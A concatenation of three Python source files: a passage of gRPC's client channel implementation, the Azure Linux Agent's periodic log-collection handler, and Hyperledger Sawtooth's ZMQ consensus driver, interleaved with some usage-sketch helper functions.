return state.response, rendezvous
else:
return state.response
else:
raise _Rendezvous(state, None, None, deadline)
def _stream_unary_invocation_operationses(metadata, initial_metadata_flags):
return (
(
cygrpc.SendInitialMetadataOperation(metadata,
initial_metadata_flags),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
def _stream_unary_invocation_operationses_and_tags(metadata,
initial_metadata_flags):
return tuple((
operations,
None,
)
for operations in _stream_unary_invocation_operationses(
metadata, initial_metadata_flags))
class _UnaryUnaryMultiCallable(grpc.UnaryUnaryMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def _prepare(self, request, timeout, metadata, wait_for_ready):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
if serialized_request is None:
return None, None, None, rendezvous
else:
state = _RPCState(_UNARY_UNARY_INITIAL_DUE, None, None, None, None)
operations = (
cygrpc.SendInitialMetadataOperation(metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request, _EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
)
return state, operations, deadline, None
def _blocking(self, request, timeout, metadata, credentials,
wait_for_ready):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata, wait_for_ready)
if state is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials, ((
operations,
None,
),), self._context)
event = call.next_event()
_handle_event(event, state, self._response_deserializer)
return state, call
def __call__(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None):
state, call, = self._blocking(request, timeout, metadata, credentials,
wait_for_ready)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None):
state, call, = self._blocking(request, timeout, metadata, credentials,
wait_for_ready)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata, wait_for_ready)
if state is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials,
(operations,), event_handler, self._context)
return _Rendezvous(state, call, self._response_deserializer,
deadline)
class _UnaryStreamMultiCallable(grpc.UnaryStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
if serialized_request is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
state = _RPCState(_UNARY_STREAM_INITIAL_DUE, None, None, None, None)
operationses = (
(
cygrpc.SendInitialMetadataOperation(metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request,
_EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials,
operationses, event_handler, self._context)
return _Rendezvous(state, call, self._response_deserializer,
deadline)
class _StreamUnaryMultiCallable(grpc.StreamUnaryMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def _blocking(self, request_iterator, timeout, metadata, credentials,
wait_for_ready):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, deadline, metadata, None
if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses_and_tags(
metadata, initial_metadata_flags), self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, None)
while True:
event = call.next_event()
with state.condition:
_handle_event(event, state, self._response_deserializer)
state.condition.notify_all()
if not state.due:
break
return state, call
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials, wait_for_ready)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials, wait_for_ready)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
event_handler = _event_handler(state, self._response_deserializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, deadline, metadata, None
if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses(
metadata, initial_metadata_flags), event_handler, self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _Rendezvous(state, call, self._response_deserializer, deadline)
class _StreamStreamMultiCallable(grpc.StreamStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_STREAM_INITIAL_DUE, None, None, None, None)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
operationses = (
(
cygrpc.SendInitialMetadataOperation(metadata,
initial_metadata_flags),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, deadline, metadata, None
if credentials is None else credentials._credentials, operationses,
event_handler, self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _Rendezvous(state, call, self._response_deserializer, deadline)
class _InitialMetadataFlags(int):
"""Stores immutable initial metadata flags"""
def __new__(cls, value=_EMPTY_FLAGS):
value &= cygrpc.InitialMetadataFlags.used_mask
return super(_InitialMetadataFlags, cls).__new__(cls, value)
def with_wait_for_ready(self, wait_for_ready):
if wait_for_ready is not None:
if wait_for_ready:
return self.__class__(self | cygrpc.InitialMetadataFlags.wait_for_ready | \
cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
elif not wait_for_ready:
return self.__class__(self & ~cygrpc.InitialMetadataFlags.wait_for_ready | \
cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
return self
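# with_wait_for_ready above encodes a tri-state (unset / True / False) in two
# bits: the wait_for_ready bit plus an "explicitly set" bit. A standalone
# sketch of that encoding with assumed bit values; the real constants live in
# cygrpc.InitialMetadataFlags.
def _example_wait_for_ready_flags():
    """Sketch of the tri-state wait_for_ready flag encoding."""
    wait_for_ready = 0x8  # assumed bit value, for illustration only
    explicitly_set = 0x10  # assumed bit value, for illustration only
    def combine(flags, value):
        if value is None:
            return flags  # leave both bits untouched
        if value:
            return flags | wait_for_ready | explicitly_set
        return (flags & ~wait_for_ready) | explicitly_set
    assert combine(0, None) == 0
    assert combine(0, True) == wait_for_ready | explicitly_set
    assert combine(wait_for_ready, False) == explicitly_set
    return True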
class _ChannelCallState(object):
def __init__(self, channel):
self.lock = threading.Lock()
self.channel = channel
self.managed_calls = 0
self.threading = False
def reset_postfork_child(self):
self.managed_calls = 0
def _run_channel_spin_thread(state):
def channel_spin():
while True:
cygrpc.block_if_fork_in_progress(state)
event = state.channel.next_call_event()
if event.completion_type == cygrpc.CompletionType.queue_timeout:
continue
call_completed = event.tag(event)
if call_completed:
with state.lock:
state.managed_calls -= 1
if state.managed_calls == 0:
return
channel_spin_thread = cygrpc.ForkManagedThread(target=channel_spin)
channel_spin_thread.setDaemon(True)
channel_spin_thread.start()
def _channel_managed_call_management(state):
# pylint: disable=too-many-arguments
def create(flags, method, host, deadline, metadata, credentials,
operationses, event_handler, context):
"""Creates a cygrpc.IntegratedCall.
Args:
flags: An integer bitfield of call flags.
method: The RPC method.
host: A host string for the created call.
deadline: A float to be the deadline of the created call or None if
the call is to have an infinite deadline.
metadata: The metadata for the call or None.
credentials: A cygrpc.CallCredentials or None.
operationses: An iterable of iterables of cygrpc.Operations to be
started on the call.
event_handler: A behavior to call to handle the events resultant from
the operations on the call.
context: Context object for distributed tracing.
Returns:
A cygrpc.IntegratedCall with which to conduct an RPC.
"""
operationses_and_tags = tuple((
operations,
event_handler,
) for operations in operationses)
with state.lock:
call = state.channel.integrated_call(flags, method, host, deadline,
metadata, credentials,
operationses_and_tags, context)
if state.managed_calls == 0:
state.managed_calls = 1
_run_channel_spin_thread(state)
else:
state.managed_calls += 1
return call
return create
class _ChannelConnectivityState(object):
def __init__(self, channel):
self.lock = threading.RLock()
self.channel = channel
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def reset_postfork_child(self):
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def _deliveries(state):
callbacks_needing_update = []
for callback_and_connectivity in state.callbacks_and_connectivities:
callback, callback_connectivity, = callback_and_connectivity
if callback_connectivity is not state.connectivity:
callbacks_needing_update.append(callback)
callback_and_connectivity[1] = state.connectivity
return callbacks_needing_update
def _deliver(state, initial_connectivity, initial_callbacks):
connectivity = initial_connectivity
callbacks = initial_callbacks
while True:
for callback in callbacks:
cygrpc.block_if_fork_in_progress(state)
try:
callback(connectivity)
except Exception: # pylint: disable=broad-except
_LOGGER.exception(
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE)
with state.lock:
callbacks = _deliveries(state)
if callbacks:
connectivity = state.connectivity
else:
state.delivering = False
return
def _spawn_delivery(state, callbacks):
delivering_thread = cygrpc.ForkManagedThread(
target=_deliver, args=(
state,
state.connectivity,
callbacks,
))
delivering_thread.start()
state.delivering = True
# NOTE(https://github.com/grpc/grpc/issues/3064): We'd rather not poll.
def _poll_connectivity(state, channel, initial_try_to_connect):
try_to_connect = initial_try_to_connect
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
callbacks = tuple(callback
for callback, unused_but_known_to_be_none_connectivity
in state.callbacks_and_connectivities)
for callback_and_connectivity in state.callbacks_and_connectivities:
callback_and_connectivity[1] = state.connectivity
if callbacks:
_spawn_delivery(state, callbacks)
while True:
event = channel.watch_connectivity_state(connectivity,
time.time() + 0.2)
cygrpc.block_if_fork_in_progress(state)
with state.lock:
if not state.callbacks_and_connectivities and not state.try_to_connect:
state.polling = False
state.connectivity = None
break
try_to_connect = state.try_to_connect
state.try_to_connect = False
if event.success or try_to_connect:
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
if not state.delivering:
callbacks = _deliveries(state)
if callbacks:
_spawn_delivery(state, callbacks)
def _moot(state):
with state.lock:
del state.callbacks_and_connectivities[:]
def _subscribe(state, callback, try_to_connect):
with state.lock:
if not state.callbacks_and_connectivities and not state.polling:
polling_thread = cygrpc.ForkManagedThread(
target=_poll_connectivity,
args=(state, state.channel, bool(try_to_connect)))
polling_thread.setDaemon(True)
polling_thread.start()
state.polling = True
state.callbacks_and_connectivities.append([callback, None])
elif not state.delivering and state.connectivity is not None:
_spawn_delivery(state, (callback,))
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append(
[callback, state.connectivity])
else:
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append([callback, None])
def _unsubscribe(state, callback):
with state.lock:
for index, (subscribed_callback, unused_connectivity) in enumerate(
state.callbacks_and_connectivities):
if callback == subscribed_callback:
state.callbacks_and_connectivities.pop(index)
break
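# _subscribe and _unsubscribe back the public Channel.subscribe API defined
# below: a polling thread watches connectivity and a delivery thread fans the
# state out to the registered callbacks. A hedged sketch of the public-API
# side; the target and wait duration are illustrative assumptions.
def _example_connectivity_watch(target='localhost:50051', seconds=2):
    """Sketch of observing channel connectivity via the public API."""
    observed = []
    def on_connectivity(connectivity):
        # connectivity is a grpc.ChannelConnectivity member, e.g. IDLE,
        # CONNECTING, TRANSIENT_FAILURE or READY.
        observed.append(connectivity)
    channel = grpc.insecure_channel(target)
    # try_to_connect=True nudges the channel out of IDLE so states change.
    channel.subscribe(on_connectivity, try_to_connect=True)
    time.sleep(seconds)
    channel.unsubscribe(on_connectivity)
    channel.close()
    return observed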
def _options(options):
return list(options) + [
(
cygrpc.ChannelArgKey.primary_user_agent_string,
_USER_AGENT,
),
]
class Channel(grpc.Channel):
"""A cygrpc.Channel-backed implementation of grpc.Channel."""
def __init__(self, target, options, credentials):
"""Constructor.
Args:
target: The target to which to connect.
options: Configuration options for the channel.
credentials: A cygrpc.ChannelCredentials or None.
"""
self._channel = cygrpc.Channel(
_common.encode(target), _options(options), credentials)
self._call_state = _ChannelCallState(self._channel)
self._connectivity_state = _ChannelConnectivityState(self._channel)
cygrpc.fork_register_channel(self)
def subscribe(self, callback, try_to_connect=None):
_subscribe(self._connectivity_state, callback, try_to_connect)
def unsubscribe(self, callback):
_unsubscribe(self._connectivity_state, callback)
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def unary_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def _close(self):
self._channel.close(cygrpc.StatusCode.cancelled, 'Channel closed!')
_moot(self._connectivity_state)
def _close_on_fork(self):
self._channel.close_on_fork(cygrpc.StatusCode.cancelled,
'Channel closed due to fork')
_moot(self._connectivity_state)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._close()
return False
def close(self):
self._close()
def __del__(self):
# TODO(https://github.com/grpc/grpc/issues/12531): Several releases
# after 1.12 (1.16 or thereabouts?) add a "self._channel.close" call
# here (or more likely, call self._close() here). We don't do this today
# because many valid use cases today allow the channel to be deleted
# immediately after stubs are created. After a sufficient period of time
# has passed for all users to be trusted to hang out to their channels
# for as long as they are in use and to close them after using them,
# then deletion of this grpc._channel.Channel instance can be made to
# effect closure of the underlying cygrpc.Channel instance.
if cygrpc is not None: # Globals may have already been collected.
cygrpc.fork_unregister_channel(self)
# This prevents the cleanup of an object whose initialization failed from raising.
# Though the __init__ failed, the removal will still trigger __del__.
if _moot is not None and hasattr(self, '_connectivity_state'):
_moot(self._connectivity_state)
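# Channel supports the context-manager protocol (__enter__/__exit__ above call
# _close), and with_call returns both the response and a grpc.Call whose code,
# details and metadata can be inspected. A hedged end-to-end sketch; the
# target, method path and payload are illustrative assumptions.
def _example_channel_with_call(target='localhost:50051'):
    """Sketch of a blocking unary call that also inspects its grpc.Call."""
    # The with-block guarantees _close() runs, cancelling in-flight RPCs.
    with grpc.insecure_channel(target) as channel:
        ping = channel.unary_unary(
            '/example.Echo/Ping',  # hypothetical method path
            request_serializer=lambda x: x,
            response_deserializer=lambda x: x)
        try:
            response, call = ping.with_call(b'ping', timeout=5)
        except grpc.RpcError as rpc_error:
            return None, rpc_error.code()
        return response, call.code()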
|
collect_logs.py
|
# Microsoft Azure Linux Agent
#
# Copyright 2020 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import os
import sys
import threading
import time
import azurelinuxagent.common.conf as conf
from azurelinuxagent.common import logger
from azurelinuxagent.common.cgroupapi import CGroupsApi
from azurelinuxagent.common.event import elapsed_milliseconds, add_event, WALAEventOperation
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.logcollector import COMPRESSED_ARCHIVE_PATH
from azurelinuxagent.common.protocol.util import get_protocol_util
from azurelinuxagent.common.utils import shellutil
from azurelinuxagent.common.utils.shellutil import CommandError
from azurelinuxagent.common.version import PY_VERSION_MAJOR, PY_VERSION_MINOR, AGENT_NAME, CURRENT_VERSION
from azurelinuxagent.ga.periodic_operation import PeriodicOperation
def get_collect_logs_handler():
return CollectLogsHandler()
def is_log_collection_allowed():
# There are three conditions that need to be met in order to allow periodic log collection:
# 1) It should be enabled in the configuration.
# 2) The system must be using systemd to manage services. Needed for resource limiting of the log collection.
# 3) The python version must be greater than 2.6 in order to support the ZipFile library used when collecting.
conf_enabled = conf.get_collect_logs()
systemd_present = CGroupsApi.is_systemd()
supported_python = PY_VERSION_MINOR >= 7 if PY_VERSION_MAJOR == 2 else PY_VERSION_MAJOR == 3
is_allowed = conf_enabled and systemd_present and supported_python
msg = "Checking if log collection is allowed at this time [{0}]. All three conditions must be met: " \
"configuration enabled [{1}], systemd present [{2}], python supported: [{3}]".format(is_allowed,
conf_enabled,
systemd_present,
supported_python)
logger.info(msg)
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.LogCollection,
is_success=is_allowed,
message=msg,
log_event=False)
return is_allowed
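# CollectLogsHandler below drives PeriodicOperation objects in a daemon loop:
# each operation runs when it is due, and the loop then sleeps until the next
# one. A simplified, standalone sketch of that pattern follows; it is an
# illustration only, not the real PeriodicOperation class from
# azurelinuxagent.ga.periodic_operation.
def _example_periodic_loop(iterations=3):
    """Simplified sketch of the periodic-operation loop used below."""
    class _SketchOperation(object):
        def __init__(self, name, operation, period_seconds):
            self.name = name
            self._operation = operation
            self._period = datetime.timedelta(seconds=period_seconds)
            self._next_run = datetime.datetime.utcnow()
        def run(self):
            now = datetime.datetime.utcnow()
            if now >= self._next_run:
                self._operation()
                self._next_run = now + self._period
    operations = [_SketchOperation("heartbeat", lambda: logger.info("tick"), 1)]
    for _ in range(iterations):
        for operation in operations:
            operation.run()
        time.sleep(0.1)  # the real loop sleeps until the next operation is due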
class CollectLogsHandler(object):
"""
Periodically collects and uploads logs from the VM to the host.
"""
_THREAD_NAME = "CollectLogsHandler"
@staticmethod
def get_thread_name():
return CollectLogsHandler._THREAD_NAME
def __init__(self):
self.protocol = None
self.protocol_util = None
self.event_thread = None
self.should_run = True
self.last_state = None
self._periodic_operations = [
PeriodicOperation("collect_and_send_logs", self.collect_and_send_logs, conf.get_collect_logs_period())
]
def run(self):
self.start(init_data=True)
def is_alive(self):
return self.event_thread.is_alive()
def start(self, init_data=False):
self.event_thread = threading.Thread(target=self.daemon, args=(init_data,))
self.event_thread.setDaemon(True)
self.event_thread.setName(self.get_thread_name())
self.event_thread.start()
def join(self):
self.event_thread.join()
def stopped(self):
return not self.should_run
def stop(self):
self.should_run = False
if self.is_alive():
self.join()
def init_protocols(self):
# The initialization of ProtocolUtil for the log collection thread should be done within the thread itself
# rather than initializing it in the ExtHandler thread. This is done to avoid any concurrency issues as each
# thread would now have its own ProtocolUtil object as per the SingletonPerThread model.
self.protocol_util = get_protocol_util()
self.protocol = self.protocol_util.get_protocol()
def daemon(self, init_data=False):
try:
if init_data:
self.init_protocols()
while not self.stopped():
try:
for op in self._periodic_operations: # pylint: disable=C0103
op.run()
except Exception as e: # pylint: disable=C0103
logger.error("An error occurred in the log collection thread main loop; "
"will skip the current iteration.\n{0}", ustr(e))
finally:
PeriodicOperation.sleep_until_next_operation(self._periodic_operations)
except Exception as e: # pylint: disable=C0103
logger.error("An error occurred in the log collection thread; will exit the thread.\n{0}", ustr(e))
def collect_and_send_logs(self):
if self._collect_logs():
self._send_logs()
@staticmethod
def _get_resource_limits():
# Define CPU limit (as percentage of CPU time) and memory limit (absolute value in megabytes).
cpu_limit = "5%"
memory_limit = "30M" # K for kb, M for mb
return cpu_limit, memory_limit
@staticmethod
def _collect_logs():
logger.info("Starting log collection...")
# Invoke the command line tool in the agent to collect logs, with resource limits on CPU and memory (RAM).
scope_name = "collect-logs-{0}.scope".format(ustr(int(time.time() * 1000000)))
systemd_cmd = ["systemd-run", "--unit={0}".format(scope_name), "--scope"]
# More info on resource limits properties in systemd here:
# https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/resource_management_guide/sec-modifying_control_groups
cpu_limit, memory_limit = CollectLogsHandler._get_resource_limits()
resource_limits = ["--property=CPUAccounting=1", "--property=CPUQuota={0}".format(cpu_limit),
"--property=MemoryAccounting=1", "--property=MemoryLimit={0}".format(memory_limit)]
# The log collection tool is invoked from the current agent's egg with the -collect-logs command line option
collect_logs_cmd = [sys.executable, "-u", sys.argv[0], "-collect-logs"]
final_command = systemd_cmd + resource_limits + collect_logs_cmd
start_time = datetime.datetime.utcnow()
success = False
msg = None
try:
shellutil.run_command(final_command, log_error=True)
duration = elapsed_milliseconds(start_time)
archive_size = os.path.getsize(COMPRESSED_ARCHIVE_PATH)
msg = "Successfully collected logs. Archive size: {0} b, elapsed time: {1} ms.".format(archive_size,
duration)
logger.info(msg)
success = True
return True
except Exception as e: # pylint: disable=C0103
duration = elapsed_milliseconds(start_time)
if isinstance(e, CommandError):
exception_message = "[stderr] {0}".format(ustr(e.stderr))  # pylint: disable=no-member
else:
exception_message = ustr(e)
msg = "Failed to collect logs. Elapsed time: {0} ms. Error: {1}".format(duration, exception_message)
# No need to log to the local log since run_command was called with log_error enabled
return False
finally:
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.LogCollection,
is_success=success,
message=msg,
log_event=False)
def _send_logs(self):
msg = None
success = False
try:
with open(COMPRESSED_ARCHIVE_PATH, "rb") as fh: # pylint: disable=C0103
archive_content = fh.read()
self.protocol.upload_logs(archive_content)
msg = "Successfully uploaded logs."
logger.info(msg)
success = True
except Exception as e: # pylint: disable=C0103
msg = "Failed to upload logs. Error: {0}".format(ustr(e))
logger.warn(msg)
finally:
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.LogCollection,
is_success=success,
message=msg,
log_event=False)
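# _collect_logs above wraps the agent's own "-collect-logs" invocation in a
# transient systemd scope so CPU and memory are capped. A hedged sketch of
# building such a command for an arbitrary program; the scope name and limit
# values are illustrative assumptions.
def _example_resource_limited_command(command, cpu_quota="5%", memory_limit="30M"):
    """Sketch of wrapping a command in a resource-limited systemd scope."""
    scope_name = "example-{0}.scope".format(int(time.time()))
    return ["systemd-run", "--unit={0}".format(scope_name), "--scope",
            "--property=CPUAccounting=1",
            "--property=CPUQuota={0}".format(cpu_quota),
            "--property=MemoryAccounting=1",
            "--property=MemoryLimit={0}".format(memory_limit)] + list(command)
# For example, _example_resource_limited_command(["echo", "hello"]) builds a
# command line that could be run on a systemd host, e.g. via
# shellutil.run_command(...), with a 5% CPU and 30M memory cap.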
|
zmq_driver.py
|
# Copyright 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
import concurrent
import logging
from queue import Queue
from threading import Thread
from sawtooth_sdk.consensus.driver import Driver
from sawtooth_sdk.consensus.engine import StartupState
from sawtooth_sdk.consensus.zmq_service import ZmqService
from sawtooth_sdk.consensus import exceptions
from sawtooth_sdk.messaging.stream import Stream
from sawtooth_sdk.protobuf import consensus_pb2
from sawtooth_sdk.protobuf.validator_pb2 import Message
LOGGER = logging.getLogger(__name__)
REGISTER_TIMEOUT = 800
SERVICE_TIMEOUT = 800
class ZmqDriver(Driver):
def __init__(self, engine):
super().__init__(engine)
self._engine = engine
self._stream = None
self._exit = False
self._updates = None
def start(self, endpoint):
LOGGER.debug('ZmqDriver: start endpoint=%s', endpoint)
self._stream = Stream(endpoint)
startup_state = self._register()
self._updates = Queue()
driver_thread = Thread(
target=self._driver_loop)
driver_thread.start()
try:
self._engine.start(
self._updates,
ZmqService(
stream=self._stream,
timeout=SERVICE_TIMEOUT,
name=self._engine.name(),
version=self._engine.version()),
startup_state)
except Exception as ex: # pylint: disable=broad-except
LOGGER.exception("Uncaught engine exception(%s)",ex)
self.stop()
driver_thread.join()
def _driver_loop(self):
try:
future = self._stream.receive()
LOGGER.debug('ZmqDriver: _driver_loop future=%s',future)
while True:
if self._exit:
self._engine.stop()
break
try:
message = future.result(1)
future = self._stream.receive()
except concurrent.futures.TimeoutError:
continue
#LOGGER.debug('ZmqDriver: _driver_loop _process')
result = self._process(message)
self._updates.put(result)
except Exception: # pylint: disable=broad-except
LOGGER.exception("Uncaught driver exception")
def stop(self):
self._exit = True
self._engine.stop()
self._stream.close()
def _register(self):
self._stream.wait_for_ready()
request = consensus_pb2.ConsensusRegisterRequest(
name=self._engine.name(),
version=self._engine.version(),
).SerializeToString()
while True:
future = self._stream.send(
message_type=Message.CONSENSUS_REGISTER_REQUEST,
content=request)
response = consensus_pb2.ConsensusRegisterResponse()
response.ParseFromString(future.result(REGISTER_TIMEOUT).content)
if (
response.status
== consensus_pb2.ConsensusRegisterResponse.NOT_READY
):
#LOGGER.debug('ZmqDriver:register NOT_READY: url=%s',self._stream._url)
continue
if response.status == consensus_pb2.ConsensusRegisterResponse.OK:
LOGGER.debug('ZmqDriver:register DONE: url=%s', self._stream._url)
return StartupState(
response.chain_head,
response.peers,
response.local_peer_info,
response.peering_mode)
raise exceptions.ReceiveError(
'Registration failed with status {}'.format(response.status))
def _process(self, message):
type_tag = message.message_type
if type_tag == Message.CONSENSUS_NOTIFY_PEER_CONNECTED:
notification = consensus_pb2.ConsensusNotifyPeerConnected()
notification.ParseFromString(message.content)
data = notification.peer_info, notification.status, notification.mode , notification.info
elif type_tag == Message.CONSENSUS_NOTIFY_PEER_DISCONNECTED:
notification = consensus_pb2.ConsensusNotifyPeerDisconnected()
notification.ParseFromString(message.content)
data = notification.peer_id
elif type_tag == Message.CONSENSUS_NOTIFY_PEER_MESSAGE:
notification = consensus_pb2.ConsensusNotifyPeerMessage()
notification.ParseFromString(message.content)
data = notification.message, notification.sender_id
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_NEW:
notification = consensus_pb2.ConsensusNotifyBlockNew()
notification.ParseFromString(message.content)
data = notification.block
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_VALID:
notification = consensus_pb2.ConsensusNotifyBlockValid()
notification.ParseFromString(message.content)
data = notification.block_id
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_INVALID:
notification = consensus_pb2.ConsensusNotifyBlockInvalid()
notification.ParseFromString(message.content)
data = notification.block_id
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_COMMIT:
notification = consensus_pb2.ConsensusNotifyBlockCommit()
notification.ParseFromString(message.content)
data = notification.block_id
else:
raise exceptions.ReceiveError(
'Received unexpected message type: {}'.format(type_tag))
self._stream.send_back(
message_type=Message.CONSENSUS_NOTIFY_ACK,
correlation_id=message.correlation_id,
content=consensus_pb2.ConsensusNotifyAck().SerializeToString())
return type_tag, data
